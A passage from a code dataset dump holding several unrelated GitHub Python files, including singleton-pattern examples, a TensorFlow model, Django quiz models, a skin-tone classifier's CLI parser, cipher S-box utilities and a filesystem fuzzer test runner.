str(budget))\r\nmain()\r\n","repo_name":"anabxathag/onlineprepro","sub_path":"เค้กช็อก.py","file_name":"เค้กช็อก.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"th","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"32643839765","text":"# Singleton/SingletonPattern.py\n\nclass OnlyOne:\n class __OnlyOne:\n def __init__(self, arg):\n self.val = arg\n def __str__(self):\n return repr(self) + self.val\n instance = None\n def __init__(self, arg):\n if not OnlyOne.instance:\n OnlyOne.instance = OnlyOne.__OnlyOne(arg)\n else:\n OnlyOne.instance.val = arg\n def __getattr__(self, name):\n return getattr(self.instance, name)\n\t\t\nclass OnlyMe:\n pass\n\nx = OnlyMe()\n\ny = OnlyOne('eggs')\n\nz = OnlyOne('spam')\nprint('---z---')\nprint(z)\nprint('---x---')\nprint(x)\nprint('---y---')\nprint(y)\nprint('---x---')\nprint(x)\nprint('---y---')\nprint(y)\nprint('---z---')\nprint(z)\n\nprint(\"------------------------------------------------------------------\")\n\nclass Singleton2(object):\n _instance = None\n def __new__(cls, *args, **kwargs):\n if not cls._instance:\n cls._instance = super(Singleton2, cls).__new__(\n cls, *args, **kwargs)\n return cls._instance\n\n\nif __name__ == '__main__':\n s1 = Singleton2()\n s2 = Singleton2()\n print(s1)\n print(s2)\n if (id(s1) == id(s2)):\n print(\"Same\")\n else:\n print(\"Different\")\n\t\t\n\nprint(\"------------------------------------------------------------------\")\n\nclass Singleton3(object):\n def __new__(cls):\n if not hasattr(cls, 'instance'):\n cls.instance = super(Singleton3, cls).__new__(cls)\n return cls.instance\n\nsingleton = Singleton3()\nanother_singleton = Singleton3()\nprint(singleton)\nprint(another_singleton)\nprint(singleton is another_singleton)\n","repo_name":"yogeshunavane/pythontest","sub_path":"examples/singleton.py","file_name":"singleton.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24034260562","text":"import sys\n\nimport tensorflow as tf\nimport numpy as np\nimport collections\n\n\nsys.path.insert(0, 'lib/')\nfrom architecture import architecture_base\n\nResults = collections.namedtuple('Results', ('output'))\n\nsys.path.insert(0, 'models/lib')\nimport variables\n\nclass architecture(architecture_base):\n def __init__(self):\n self.hparams = tf.contrib.training.HParams(\n decay_rate=0.9,\n decay_steps=10000.,\n learning_rate=1.e-5, # 0.001\n maximum_learning_rate = 1.e-8, # 1.e-7\n )\n\n def __test_config__(self):\n pass\n\n def build(self, input_images):\n self.__test_config__()\n #input images = [batch, height,width] BUT COMPLEX TYPE!\n its = input_images.get_shape().as_list() # [batch, features]\n input_images = tf.squeeze(tf.reshape(input_images, [its[0], its[1]*its[2], 1]), axis=2)\n print(\"input size\")\n print(its)\n layer1 = tf.layers.dense(input_images, 1024, activation=tf.nn.relu,name='0',reuse=tf.AUTO_REUSE)\n print(\"layer\")\n print(layer1.get_shape().as_list())\n layer1 = tf.layers.dense(layer1, 768, activation=tf.nn.relu,name='1',reuse=tf.AUTO_REUSE)\n layer1 = tf.layers.dense(layer1, 512, activation=tf.nn.relu,name='2',reuse=tf.AUTO_REUSE)\n layer1 = tf.layers.dense(layer1, 256, activation=tf.nn.relu,name='3',reuse=tf.AUTO_REUSE)\n layer1 = tf.layers.dense(layer1, 256, activation=tf.nn.relu,name='4',reuse=tf.AUTO_REUSE)\n layer1 = tf.layers.dense(layer1, 256, activation=tf.nn.relu,name='5',reuse=tf.AUTO_REUSE)\n layer1 = tf.layers.dense(layer1, 128, activation=tf.nn.relu,name='6',reuse=tf.AUTO_REUSE)\n layer1 = tf.transpose(tf.expand_dims(layer1, axis=2), [0,2,1])\n W_1 = variables.weight_variable([1, 128, 2])\n W_1 = tf.tile(W_1, [its[0], 1, 1])\n b_1 = variables.bias_variable([1])\n layer2 = tf.add(tf.matmul(layer1,W_1), b_1)\n print(\"final\")\n print(layer2.get_shape().as_list())\n layer2 = tf.reshape(layer2, [its[0], 1, 2])\n\n result = Results(layer2)\n print(\">>>>> Graph Built!\")\n\n with tf.device('/cpu:0'):\n global_step = tf.get_variable('global_step', [], initializer=tf.constant_initializer(0), trainable=False) # [] [unfinished]\n global_step = tf.add(global_step, 1)\n return result\n\n\n\n def loss_func(self, input_images, ground_truth, validation_input_images, validation_ground_truth, extra_data, validation_extra_data):\n input_images = tf.expand_dims(input_images, axis=3)\n #input_images = tf.expand_dims(extra_data[\"duplicate\"], axis=3)\n ground_truth = tf.expand_dims(ground_truth, axis=3)\n print(\">>>>>>Shape\")\n print(input_images.get_shape().as_list())\n validation_input_images = tf.expand_dims(validation_input_images, axis=3)\n #validation_input_images = tf.expand_dims(validation_extra_data[\"duplicate\"], axis=3)\n validation_ground_truth = tf.expand_dims(validation_ground_truth, axis=3)\n mini_batch_size = input_images.get_shape().as_list()[0]\n validation_mini_batch_size = validation_input_images.get_shape().as_list()[0]\n\n\n input_images = tf.squeeze(input_images, axis=3)\n ground_truth = tf.squeeze(ground_truth, axis=3)\n validation_input_images = tf.squeeze(validation_input_images, axis=3)\n validation_ground_truth = tf.squeeze(validation_ground_truth, axis=3)\n\n\n print(\">>>Start Building Architecture.\")\n res = self.build(input_images)\n print(\">>>Finished Building Architecture.\")\n output = res.output\n\n print(\">>> Run on validation set\")\n validation_res = self.build(validation_input_images)\n validation_output = validation_res.output\n print(\">>> Find MSE for the validation set\")\n v_diff = tf.subtract(tf.cast(validation_ground_truth, tf.float32), validation_output)\n v_MSE_loss = tf.norm(v_diff)\n with tf.name_scope('validation'):\n tf.summary.scalar(\"validation_total_loss\", tf.reduce_sum(v_MSE_loss))\n print(\">>>Some Maths on result\")\n print(\">>>> Find Difference\")\n difference = tf.subtract(tf.cast(ground_truth, tf.float32), tf.cast(res.output, tf.float32))\n print(\">>>> Find Norm\")\n #L2_norm = tf.norm(difference, axis=[1,2])\n #L1_norm = tf.abs(difference)\n #L2_norm = L1_norm\n\n accuracy_all = tf.abs(100.*tf.divide(tf.subtract(tf.cast(ground_truth, tf.float32), tf.cast(res.output, tf.float32)), tf.cast(ground_truth, tf.float32)))\n a_s = accuracy_all.get_shape().as_list()\n accuracy_1 = tf.squeeze(tf.squeeze(tf.slice(accuracy_all, [0,0,0], [a_s[0], a_s[1], 1]), axis=2), axis=1)\n accuracy_2 = tf.squeeze(tf.squeeze(tf.slice(accuracy_all, [0,0,1], [a_s[0], a_s[1], 1]), axis=2), axis=1)\n\n print(\">>>> Find Mean of Norm\")\n\n L2_norm = tf.norm(difference)\n batch_loss = tf.reduce_sum(L2_norm)\n difference=tf.real(difference)\n print(\">>>> Find + and - loss\")\n positive_loss = tf.reduce_sum(tf.boolean_mask(difference, tf.greater(difference, 0.)))\n negative_loss = tf.reduce_sum(tf.boolean_mask(difference, tf.less(difference, 0.)))\n\n print(\">>>> Find Mean Loss\")\n with tf.name_scope('total'):\n print(\">>>>>> Add to collection\")\n tf.add_to_collection('losses', batch_loss)\n print(\">>>>>> Creating summary\")\n tf.summary.scalar(name='batch_L2_reconstruction_cost', tensor=batch_loss)\n print(\">>>> Add result to collection of loss results for this tower\")\n all_losses = tf.get_collection('losses') # [] , this_tower_scope) # list of tensors returned\n total_loss = tf.add_n(all_losses) # element-wise addition of the list of tensors\n #print(total_loss.get_shape().as_list())\n tf.summary.scalar('total_loss', total_loss)\n print(\">>>> Add results to output\")\n with tf.name_scope('accuracy'):\n tf.summary.scalar('positive_loss', positive_loss)\n tf.summary.scalar('negative_loss', tf.multiply(negative_loss, -1.))\n #tf.summary.scalar('estimate_accuracy', accuracy_1)\n #tf.summary.scalar('moe_accuracy', accuracy_2)\n\n\n diagnostics = {'positive_loss':positive_loss, 'negative_loss':negative_loss, 'total_loss':total_loss, 'mse': L2_norm, 'accuracy': accuracy_1, 'moe_acc': accuracy_2}\n return output, batch_loss, diagnostics, [] #, [tf.get_variable('ConvCaps1/squash/weights')]\n","repo_name":"gavins13/aihack2018","sub_path":"nn/models/dc_cnn/architectures/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"39187738028","text":"from utils import get_content_size\nimport cairo\nimport gtk\nimport pango\nimport sys\n\n# Below import must at end, otherwise will got ImportError\nfrom draw import draw_vlinear, draw_text\n\ndef render_pixbuf(widget, event, input_args):\n '''\n Render and save pixbuf.\n\n @param widget: Gtk.Widget instance.\n @param event: Expose event.\n @param input_args: Input arguments as format: (select_num, vlinear_color, text_color, filepath).\n '''\n # Init.\n (select_num, vlinear_color, text_color, filepath) = input_args\n\n cr = widget.window.cairo_create()\n rect = widget.allocation\n num_pixbuf = gtk.gdk.Pixbuf(gtk.gdk.COLORSPACE_RGB, True, 8, rect.width, rect.height)\n\n # Draw background.\n cr.set_operator(cairo.OPERATOR_OVER)\n draw_vlinear(cr, rect.x, rect.y, rect.width, rect.height, eval(vlinear_color))\n\n # Draw text.\n draw_text(cr, select_num, rect.x, rect.y, rect.width, rect.height, text_color=text_color,\n alignment=pango.ALIGN_CENTER)\n\n # Render pixbuf from drawing area.\n num_pixbuf.get_from_drawable(\n widget.window, widget.get_colormap(), 0, 0, 0, 0,\n rect.width, rect.height).save(filepath, \"png\")\n\n # Exit after generate png file.\n gtk.main_quit()\n\nif __name__ == \"__main__\":\n # Get input arguments.\n input_args = sys.argv[1::]\n (select_num, vlinear_color, text_color, filepath) = input_args\n\n # Init.\n num_padding_x = 8\n num_padding_y = 1\n (num_width, num_height) = get_content_size(select_num)\n pixbuf_width = num_width + num_padding_x * 2\n pixbuf_height = num_height + num_padding_y * 2\n\n # Create window.\n window = gtk.Window(gtk.WINDOW_POPUP)\n window.set_colormap(gtk.gdk.Screen().get_rgba_colormap())\n window.move(-pixbuf_width, -pixbuf_height) # move out of screen\n window.set_default_size(pixbuf_width, pixbuf_height)\n window.connect(\n \"expose-event\",\n lambda w, e: render_pixbuf(w, e, input_args))\n\n window.show_all()\n\n gtk.main()\n","repo_name":"martyr-deepin/deepin-ui","sub_path":"dtk/ui/listview_preview_pixbuf.py","file_name":"listview_preview_pixbuf.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"44"} +{"seq_id":"74057933254","text":"import argparse\nimport functools\nimport glob\nimport os\nimport re\nimport string\nimport sys\nfrom pathlib import Path\nfrom typing import Union\nfrom urllib.parse import urlparse\n\n\nclass ArgumentError(ValueError):\n \"\"\"\n Wrapper for argument error. This exception will be raised when the arguments are invalid.\n \"\"\"\n pass\n\n\n# @functools.cache # Python 3.9+\n@functools.lru_cache(maxsize=128) # Python 3.2+\ndef alphabet_id(n):\n letters = string.ascii_uppercase\n n_letters = len(letters)\n if n < n_letters:\n return letters[n]\n _id = \"\"\n\n while n > 0:\n remainder = (n - 1) % n_letters\n _id = letters[remainder] + _id\n n = (n - 1) // n_letters\n\n return _id\n\n\ndef is_url(text):\n return urlparse(text).scheme in [\"http\", \"https\"]\n\n\ndef extract_filename_and_extension(url):\n \"\"\"\n Extract base filename and extension from the url.\n :param url: URL with filename and extension, e.g., https://example.com/images/pic.jpg?param=value\n :return: Base filename and extension, e.g., pic, jpg\n \"\"\"\n parsed_url = urlparse(url)\n path = parsed_url.path\n filename = path.split(\"/\")[-1]\n basename, *extension = filename.split(\".\")\n return basename, f\".{extension[0]}\" if extension else None\n\n\ndef build_image_paths(images):\n filenames, urls = [], []\n valid_images = [\"*.jpg\", \"*.gif\", \"*.png\", \"*.jpeg\", \"*.webp\", \"*.tif\"]\n for name in images:\n if os.path.isdir(name):\n filenames.extend([glob.glob(os.path.join(name, \"./**/\", i), recursive=True) for i in valid_images])\n elif os.path.isfile(name):\n filenames.append([name])\n elif is_url(name):\n urls.append(name)\n paths = [Path(f) for fs in filenames for f in fs] + urls\n if len(paths) == 0:\n raise FileNotFoundError(\"No valid images in the specified path.\")\n # Sort paths by (first) number extracted from the filename string\n paths.sort(key=sort_file)\n return paths\n\n\ndef sort_file(path: Union[str, Path]):\n if isinstance(path, Path):\n basename = path.stem\n else:\n basename, *_ = extract_filename_and_extension(path)\n nums = re.findall(r\"\\d+\", basename)\n return int(nums[0]) if nums else 0\n\n\ndef is_windows():\n return sys.platform in [\"win32\", \"cygwin\"]\n\n\ndef build_arguments():\n # Setup arguments\n parser = argparse.ArgumentParser(\n description=\"Skin Tone Classifier\",\n formatter_class=argparse.RawTextHelpFormatter,\n )\n parser.add_argument(\n \"-i\",\n \"--images\",\n nargs=\"+\",\n default=\"./\",\n metavar=\"IMAGE FILENAME\",\n help=\"Image filename(s) or URLs to process;\\n\"\n 'Supports multiple values separated by space, e.g., \"a.jpg b.png\";\\n'\n 'Supports directory or file name(s), e.g., \"./path/to/images/ a.jpg\";\\n'\n 'Supports URL(s), e.g., \"https://example.com/images/pic.jpg\" since v1.1.0+.\\n'\n \"The app will search all images in current directory in default.\",\n )\n parser.add_argument(\n \"-t\",\n \"--image_type\",\n default=\"auto\",\n metavar=\"IMAGE TYPE\",\n help=\"Specify whether the input image(s) is/are colored or black/white.\\n\"\n 'Valid choices are: \"auto\", \"color\" or \"bw\",\\n'\n 'Defaults to \"auto\", which will be detected automatically.',\n choices=[\"auto\", \"color\", \"bw\"],\n )\n parser.add_argument(\n \"-p\",\n \"--palette\",\n nargs=\"+\",\n metavar=\"COLOR\",\n help=\"Skin tone palette;\\n\"\n 'Supports RGB hex value leading by \"#\" or RGB values separated by comma(,),\\n'\n 'E.g., \"-p #373028 #422811\" or \"-p 255,255,255 100,100,100\"',\n )\n parser.add_argument(\n \"-l\",\n \"--labels\",\n nargs=\"+\",\n metavar=\"LABEL\",\n help=\"Skin tone labels; default values are the uppercase alphabet list leading by the image type ('C' for 'color'; 'B' for 'Black&White'), \"\n \"e.g., ['CA', 'CB', ..., 'CZ'] or ['BA', 'BB', ..., 'BZ'].\",\n )\n parser.add_argument(\n \"-d\",\n \"--debug\",\n action=\"store_true\",\n help=\"Whether to generate report images, used for debugging and verification.\"\n \"The report images will be saved in the './debug' directory.\",\n )\n parser.add_argument(\n \"-bw\",\n \"--black_white\",\n action=\"store_true\",\n help=\"Whether to convert the input to black/white image(s).\\n\"\n \"If true, the app will use the black/white palette to classify the image.\",\n )\n parser.add_argument(\n \"-o\",\n \"--output\",\n default=\"./\",\n metavar=\"DIRECTORY\",\n help=\"The path of output file, defaults to current directory.\",\n )\n parser.add_argument(\n \"--n_workers\",\n type=int,\n help=\"The number of workers to process the images, defaults to the number of CPUs in the system.\",\n default=0,\n )\n\n parser.add_argument(\n \"--n_colors\",\n type=int,\n metavar=\"N\",\n help=\"CONFIG: the number of dominant colors to be extracted, defaults to 2.\",\n default=2,\n )\n parser.add_argument(\n \"--new_width\",\n type=int,\n metavar=\"WIDTH\",\n help=\"CONFIG: resize the images with the specified width. Negative value will be ignored, defaults to 250.\",\n default=250,\n )\n\n # For the next parameters, refer to https://stackoverflow.com/a/20805153/8860079\n parser.add_argument(\n \"--scale\",\n type=float,\n help=\"CONFIG: how much the image size is reduced at each image scale, defaults to 1.1\",\n default=1.1,\n )\n parser.add_argument(\n \"--min_nbrs\",\n type=int,\n metavar=\"NEIGHBORS\",\n help=\"CONFIG: how many neighbors each candidate rectangle should have to retain it.\\n\"\n \"Higher value results in less detections but with higher quality, defaults to 5.\",\n default=5,\n )\n parser.add_argument(\n \"--min_size\",\n type=int,\n nargs=\"+\",\n metavar=(\"WIDTH\", \"HEIGHT\"),\n help='CONFIG: minimum possible face size. Faces smaller than that are ignored, defaults to \"90 90\".',\n default=(90, 90),\n )\n parser.add_argument(\n \"--threshold\",\n type=float,\n metavar=\"THRESHOLD\",\n help=\"CONFIG: what percentage of the skin area is required to identify the face, defaults to 0.3.\",\n default=0.3,\n )\n\n return parser.parse_args()\n","repo_name":"ChenglongMa/SkinToneClassifier","sub_path":"src/stone/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6420,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"44"} +{"seq_id":"30838386910","text":"from django.db import models\nimport random \nimport logging\nimport sys\nimport uuid\nfrom base_rest.models import BaseModel\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\n\nlogger = logging.getLogger(__name__)\n\n\n\n\n\nclass QuestionCategory(BaseModel):\n category_name = models.CharField(max_length=100)\n \n \n class Meta:\n verbose_name = 'QuestionCategory'\n \n \n def __str__(self):\n return self.category_name\n\n\n\nclass Question(BaseModel):\n \n question_category = models.ForeignKey(\"QuestionCategory\",related_name=\"question_category\", on_delete=models.CASCADE , null=True , blank=True)\n question_text = models.CharField(max_length=1000)\n question_type = models.IntegerField(choices = ((1 , 'MCQ') , (2 , 'SUBJECTIVE')))\n marks_per_question = models.IntegerField(default=5)\n\n \n def __str__(self):\n return self.question_text\n \n def get_question_type(self):\n if self.question_type == 1:\n return \"MCQ\"\n return \"SUBJECTIVE\"\n\n\nclass Choice(BaseModel):\n \n question = models.ForeignKey(\"Question\", related_name=\"choices\" , on_delete=models.CASCADE)\n choice = models.CharField(\"Choice\", max_length=50)\n is_correct = models.BooleanField(default=False)\n \n \n class Meta:\n unique_together = [\n (\"question\", \"choice\"), \n ]\n\n def __str__(self):\n return self.choice\n\n\nclass Quiz(BaseModel):\n\n quiz_name = models.CharField(max_length=100)\n question_category = models.ManyToManyField(QuestionCategory)\n question_limit_per_section = models.IntegerField(default=5)\n \n \n def __str__(self):\n return self.quiz_name\n\n \n\nclass QuizStatus(BaseModel):\n \n user = models.ForeignKey(User , related_name=\"user\" , on_delete=models.SET_NULL ,null =True , blank = True)\n quiz = models.ForeignKey(Quiz , related_name=\"quiz\" , on_delete=models.SET_NULL , null = True , blank =True)\n quiz_status_json = models.TextField(default=\"[]\")\n is_completed = models.BooleanField(default=False)\n \n \n def generate_random_questions(self):\n try:\n question_limit_per_section = self.quiz.question_limit_per_section\n quiz_categories = self.quiz.question_category.all()\n \n questions = []\n \n \n for quiz_category in quiz_categories:\n questions_by_category = Question.objects.filter(question_category = quiz_category )\n random_question_by_category = (list(questions_by_category))\n # shuffling to get random data\n random.shuffle(random_question_by_category)\n random_question_by_category = random_question_by_category[0:question_limit_per_section] \n for random_question in random_question_by_category:\n questions.append(random_question)\n \n return questions\n \n \n \n except Exception as e:\n exc_type, exc_obj, exc_tb = sys.exc_info()\n logger.error(\"generate_random_questions: %s at %s\", str(e), str(exc_tb.tb_lineno))\n\n \n \nclass QuestionAttempted(BaseModel):\n \n quiz_status = models.ForeignKey(QuizStatus , on_delete=models.CASCADE)\n question = models.ForeignKey(Question , on_delete=models.SET_NULL , null=True , blank=True)\n answer_answered_by_user = models.ForeignKey(Choice , on_delete=models.SET_NULL , null=True , blank=True)\n subjective_answer = models.TextField(blank=True , null=True)\n marks = models.IntegerField(default=-1)\n \n \n\n\n \n \n ","repo_name":"boxabhi/quiz_api","sub_path":"quiz/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19938466643","text":"import pandas as pd\nfrom searcher.trec_topic_searcher import TRECTopicSearcher\nfrom searcher.known_item_searcher import KnownItemSearcher\nfrom config import default as config\nfrom pyserini.search import get_topics\n\ntopics = get_topics('core17')\n \ntts = TRECTopicSearcher(path_idx=config['PATH_IDX'], \n path_bg_model=config['BM'], \n collection=config['COLLECTION'],\n topic_models_path=config['TOPIC_MODELS'],\n _lambda=config['LAMBDA'])\n\ntts_tfidf = TRECTopicSearcher(path_idx=config['PATH_IDX'], \n path_bg_model=config['BM'], \n collection=config['COLLECTION'],\n topic_models_path=config['TOPIC_MODELS'],\n _lambda=config['LAMBDA'])\n\nkis = KnownItemSearcher(path_idx=config['PATH_IDX'], \n path_bg_model=config['BM'], \n collection=config['COLLECTION'],\n topic_models_path=config['TOPIC_MODELS'],\n _lambda=config['LAMBDA'])\n\ntts_tfidf.set_term_order('tfidf')\n\ndata = []\n\nfor strategy in ['s1', 's2', 's3', 's4', 's5']:\n\n for topic in topics.keys():\n qc_tts = tts.get_query_candidates(topic=topic, strategy=strategy)\n qc_tts_tfidf = tts_tfidf.get_query_candidates(topic=topic, strategy=strategy)\n qc_kis = kis.get_query_candidates(topic=topic, strategy=strategy)\n\n for rank in range(1, 11):\n data.append({'topic': topic,\n 'strategy': strategy,\n 'rank': rank,\n 'tts': qc_tts[rank-1],\n 'tts_tfidf': qc_tts_tfidf[rank-1],\n 'kis': qc_kis[rank-1]})\n\npd.DataFrame(data).to_csv('data/queries/s12345.csv', index=False)\n","repo_name":"irgroup/ecir2022-uqv-sim","sub_path":"sim/simulate_queries_s12345.py","file_name":"simulate_queries_s12345.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"10831132705","text":"from sage.all import *\n\nfrom sage.crypto.sbox import SBox\nfrom sage.crypto import sboxes\nfrom sage.misc.cachefunc import cached_method\n\nfrom collections import Counter\n\nimport PIL\nfrom PIL import Image\n\nimport numpy as np\n\nfrom math import log2\n\nprint(version())\n\n\ndef xddt(sbox: SBox):\n if (hasattr(sbox, '_xddt')):\n return sbox._xddt\n\n nrows = 1 << sbox.input_size()\n ncols = 1 << sbox.output_size()\n\n res = [[set() for _ in range(ncols)] for _ in range(nrows)]\n res = np.zeros((nrows, ncols), dtype=object)\n for i in range(nrows):\n for j in range(nrows):\n res[i, j] = set()\n\n for x in range(nrows):\n sx = sbox[x]\n for y in range(nrows):\n sy = sbox[y]\n res[x ^ y, sx ^ sy].add(x)\n\n setattr(sbox, '_xddt', res)\n return res\n\n\ndef yddt(sbox: SBox):\n if (hasattr(sbox, '_yddt')):\n return sbox._yddt\n\n nrows = 1 << sbox.input_size()\n ncols = 1 << sbox.output_size()\n\n res = [[set() for _ in range(ncols)] for _ in range(nrows)]\n res = np.zeros((nrows, ncols), dtype=object)\n for i in range(nrows):\n for j in range(nrows):\n res[i, j] = set()\n\n for x in range(nrows):\n sx = sbox[x]\n for y in range(nrows):\n sy = sbox[y]\n res[x ^ y, sx ^ sy].add(sx)\n\n setattr(sbox, '_yddt', res)\n return res\n\ndef differential_spectrum(sbox: SBox):\n ddt = np.array(sbox.difference_distribution_table())\n return Counter(np.sort(ddt.ravel())[::-1])\n\n\ndef print_bitmap(bitmap: np.array, displ = lambda x : '# ' if x else ' '):\n if len(bitmap.shape) != 2:\n raise ValueError('bitmap must be 2d array')\n\n for row in range(bitmap.shape[0]):\n for col in range(bitmap.shape[1]):\n print(displ(bitmap[row, col]), end='')\n print()\n\ndef render_bitmap(bitmap: np.array):\n if len(bitmap.shape) != 2:\n raise ValueError('bitmap must be 2d array')\n\n img = Image.fromarray(bitmap)\n img.show()\n return img\n\ndef render_bitmap_log(bitmap: np.array, factor: float):\n p = bitmap / np.max(bitmap)\n imgbuf = np.zeros_like(bitmap, dtype=np.int32)\n imgbuf[p > 0] = 255 + factor * np.log2(p[p > 0])\n img = Image.fromarray(imgbuf, mode=\"L\")\n img.show()\n return img\n\n\nsboxes.DEFAULT = SBox(int(x, 16) for x in \"037ed4a9cf18b265\")\nsboxes.BAKSHEESH = SBox(int(x, 16) for x in \"306DB58ECF924A71\")\nsboxes.SPEEDY = SBox([8, 0, 9, 3, 56, 16, 41, 19, 12, 13, 4, 7, 48, 1, 32, 35,\n 26, 18, 24, 50, 62, 22, 44, 54, 28, 29, 20, 55, 52, 5,\n 36, 39, 2, 6, 11, 15, 51, 23, 33, 21, 10, 27, 14, 31, 49,\n 17, 37, 53, 34, 38, 42, 46, 58, 30, 40, 60, 43, 59, 47,\n 63, 57, 25, 45, 61])\n\n# SBox.xddt = xddt\n# SBox.yddt = yddt\n\n# SBox.ddt = lambda s : np.array(s.difference_distribution_table())\n# SBox.lat = lambda s : np.array(s.linear_approximation_table())\n# SBox.bct = lambda s : np.array(s.boomerang_connectivity_table())\n\n# SBox.differential_spectrum = differential_spectrum\n","repo_name":"fanosta/dotfiles","sub_path":"ipython/.ipython/profile_sage/startup/00-sage.py","file_name":"00-sage.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"3905579755","text":"from pickle5 import pickle\nimport inspect\nimport requests\n\n\nclass Classifier:\n \"\"\"\n Text classification using pre-trained model\n previsouly serialized using Pickle\n \"\"\"\n\n def __init__(self):\n pass\n\n def predict_category(self, offer):\n \"\"\"\n Classify job offer and generate\n relevant tags or categories\n\n :param offer: Offer object \n \"\"\"\n\n # load saved model and vectorizer\n model_path = 'application/ai/job_classification_model.pickle'\n vect_path = 'application/ai/job_classification_vect.pickle'\n\n saved_model = pickle.load(open(model_path, 'rb'))\n saved_vect = pickle.load(open(vect_path, 'rb'))\n\n # Custom categories based on specific domain knowledge\n tags = {\n 0: 'Marketing',\n 1: 'Finance',\n 2: 'Informatique',\n 3: 'Assistanat',\n 4: 'Transport',\n 5: 'Marketing',\n 6: 'Management',\n 7: 'Communication',\n 8: 'Technicien',\n 9: 'Entrepreneuriat'\n }\n\n tag_values = saved_model.transform(\n saved_vect.transform([offer.content]))\n\n # do the prediction\n dominant_tag_ids = tag_values.argmax(axis=1)\n predicted_tags = [tags[x] for x in dominant_tag_ids]\n\n return predicted_tags\n","repo_name":"samuelguebo/bara-app-python-rest-api","sub_path":"application/ai/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"38115283449","text":"from typing import List, Tuple, Set, NamedTuple, Optional\n\nimport re\nimport os\nimport sys\nimport shutil\nimport struct\nimport logging\nimport traceback\n\nfrom enum import Enum\nfrom argparse import ArgumentParser\n\nfrom fs import FSWorker\nfrom fs_ext4 import FS_CONFIGS_EXT4, FSWorker_EXT4\nfrom fs_btrfs import FS_CONFIGS_BTRFS, FSWorker_BTRFS\nfrom fs_xfs import FS_CONFIGS_XFS, FSWorker_XFS\nfrom emu import Emulator, create_emulator, attach_emulator\nfrom fuzz_exec import ExecResolver\nfrom dart_viz import VizRuntime\n\nfrom util import prepdn, touch, ascii_encode, enable_coloring_in_logging\n\nimport config\n\n\nclass TestID(Enum):\n PLAIN = 0\n\n\nclass TestCase(NamedTuple):\n tid: TestID\n args: Tuple[bytes, ...]\n\n def name(self) -> str:\n return '{}-{}'.format(self.tid.value, self.tid.name)\n\n def pack(self) -> bytes:\n meta = struct.pack('QQ', self.tid.value, len(self.args))\n data = b''.join(self.args)\n return meta + data\n\n\nTEST_CASES = [\n TestCase(TestID.PLAIN, ())\n]\n\n\nclass TestExec(object):\n\n def __init__(\n self, iseq: int, fswork: FSWorker, sample: str, fast: bool = False\n ) -> None:\n # basics\n self.iseq = iseq\n self.fswork = fswork\n self.sample = sample\n self.fast = fast\n\n def run_once(self, case: TestCase, seqn: Optional[int] = None) -> bool:\n logging.info('[{}] Running test case {}'.format(\n self.iseq, case.name() if seqn is None else '{} [{}]'.format(\n case.name(), seqn\n )\n ))\n\n base = os.path.join(config.TEST_RESULT_PATH, case.name())\n prepdn(base, override=True)\n\n with create_emulator(False) as emu:\n # pass the instance id via kernel boot parameters\n emu.boot_args.append('dart_instance={}'.format(self.iseq))\n\n # execute\n if self._run_execute(emu, base, case) and self.fast:\n return True\n\n # analyze\n runtime = self._run_analyze(emu, base)\n\n '''\n # keep running until error\n if runtime is None:\n return False\n\n return len(runtime.races) == 0\n '''\n\n # TODO (temporary code)\n # save unexpected states\n if runtime is None or len(runtime.races) != 0:\n repo = os.path.join(config.TEST_RESULT_PATH, 'rs')\n prepdn(repo)\n\n # copy files\n pdst = os.path.join(repo, str(seqn))\n shutil.copytree(base, pdst)\n\n # report\n if runtime is None:\n logging.error('Analysis failed: {}'.format(pdst))\n else:\n logging.warning('Data race detected: {}'.format(pdst))\n\n return True\n\n def run_rept(self, case: TestCase, repn: Optional[int] = None) -> None:\n i = 0\n while True:\n if not self.run_once(case, i):\n logging.warning('Test failed')\n break\n\n i += 1\n if repn is not None and i == repn:\n logging.info('All test runs passed')\n break\n\n def _run_execute(self, emu: Emulator, base: str, case: TestCase) -> bool:\n # copy over the image\n shutil.copy2(\n self.fswork.path_sample(self.sample),\n os.path.join(emu.session_tmp, config.VIRTEX_DISK_IMG_NAME)\n )\n\n # inputs\n with open(emu.session_shm, 'r+b') as f:\n # put the metadata\n f.seek(config.INSTMEM_OFFSET(\n self.iseq\n ) + config.INSTMEM_OFFSET_METADATA)\n\n f.write(struct.pack(\n '@c7sQ',\n ascii_encode('t'),\n ascii_encode('test'),\n 0,\n ))\n\n # put the mount options\n f.write(self.fswork.pack_mount())\n\n # put the test case info\n f.write(case.pack())\n\n # launch\n stdout, stderr = emu.launch()\n\n # outputs\n with open(emu.session_shm, 'rb') as f:\n # analyze the rtinfo\n f.seek(config.INSTMEM_OFFSET(\n self.iseq\n ) + config.INSTMEM_OFFSET_RTINFO)\n\n feedback = ExecResolver.process_wks(f)\n\n # save the results\n with open(os.path.join(base, 'stdout'), 'w') as t:\n t.write(stdout)\n\n with open(os.path.join(base, 'stderr'), 'w') as t:\n t.write(stderr)\n\n # result\n return feedback.has_proper_exit == 1\n\n def _run_analyze(self, emu: Emulator, base: str) -> Optional[VizRuntime]:\n ledger_src = os.path.join(emu.session_tmp, 'ledger')\n ledger_dst = os.path.join(base, 'ledger')\n\n # copy over the raw ledger (or copy from memory)\n if os.path.exists(ledger_src):\n shutil.copy2(ledger_src, ledger_dst)\n\n else:\n logging.warning('unable to find ledger on disk')\n\n # try to steal from memory\n with 